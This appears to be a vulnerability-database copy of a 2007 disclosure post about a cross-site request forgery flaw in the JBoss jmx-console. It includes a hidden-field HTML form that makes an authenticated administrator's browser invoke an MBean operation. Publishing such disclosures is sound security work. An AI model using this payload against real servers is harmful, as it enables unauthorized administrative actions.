Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16160
HistoryFeb 23, 2007 - 12:00 a.m.

JBoss jmx-console CSRF

2007-02-2300:00:00
vulners.com
32
JSON

Hello!
Recent message about JBoss's console made me looking at that interface again and it seems that it is vulnerable for the CRSF attacks.

MBean settings may be changed and operations may be invoked on behalf of the authenticated administrator by the hidden submitting form like follows:

<form method="post" action="http://host:port/jmx-console/HtmlAdaptor">
<input type="hidden" name="action" value="invokeOp">
<input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">

<input type="hidden" name="methodIndex" value="0">
<input type="submit" value="Invoke">
</form>

Please, correct me, if I'm wrong.

BR,
B.R.
Best regards,

JSON